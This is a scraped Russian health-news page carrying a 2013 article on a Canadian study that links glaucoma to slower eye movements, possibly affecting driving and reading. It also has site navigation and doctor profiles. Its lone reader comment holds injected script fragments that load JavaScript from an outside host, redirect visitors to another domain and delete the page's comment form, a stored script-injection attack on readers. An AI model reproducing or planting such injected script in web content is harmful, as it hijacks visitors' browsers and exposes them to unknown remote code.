Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Люди с повышенным внутриг...  >>  Люди с повышенным внутриглазным давлением чаще разбиваются на машинах
 
Обратная связь
 

Люди с повышенным внутриглазным давлением чаще разбиваются на машинах

Размер шрифта
19 февраля 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Канадские ученые установили, что у пациентов с глаукомой, даже на ранних стадиях заболевания, значительно замедлены движения глаз.

Быстрые синхронные движения глаз играют важную роль в повседневной активности. Они необходимы нам для выполнения различных действий – от чтения до сканирования окружающего пространства. Канадский офтальмолог Ниру Гупта и его коллеги провели исследование, в котором приняли участие пациенты с глаукомой и здоровые добровольцы. На голове участников исследования были закреплены специальные приборы, позволяющие определить время, которое требовалось для перемещения глаз с одной точки на другую.

Оказалось, что у пациентов с глаукомой, даже на ранних стадиях заболевания, глаза движутся на 15% медленнее, чем у здоровых людей. В настоящее время для диагностики глаукомы используется исследование зрительного нерва. Однако полученные данные свидетельствуют о возможности применения нового метода диагностики, отражающего влияние глаукомы на жизнь пациентов. Все методы лечения глаукомы направлены на уменьшение внутриглазного давления и замедление повреждения зрительного нерва, однако, они не позволяют вылечить заболевание.

«Теперь, когда мы знаем, что у пациентов с глаукомой глаза движутся медленнее, мы можем понять, как заболевание влияет на повседневную активность – ходьбу по лестнице, вождение автомобиля и чтение», – поясняет Ниру Гупта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лекарство от глаукомы помогает при облысении   Пять способов борьбы с сухостью глаз   Диагноз «шизофрения» можно поставить по движению глаз   Глаза расскажут о состоянии головного мозга  
18 февраля 2013Люди с повышенным внутриглазным давлением чаще разбиваются на машинах 13 марта 2013Куда надо смотреть, чтобы понять, что думает человек
 
24 октября 2012Настоящее чудо: слепые смогут снова видеть 19 октября 2012Мужчины и женщины воспринимают мир по-разному
 

Слайдшоу

1
Мифы и факты о глазах
Продукты для здоровья глаз
Наглядное руководство по заболеваниям глаз

Тесты

Проверьте свое зрение
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.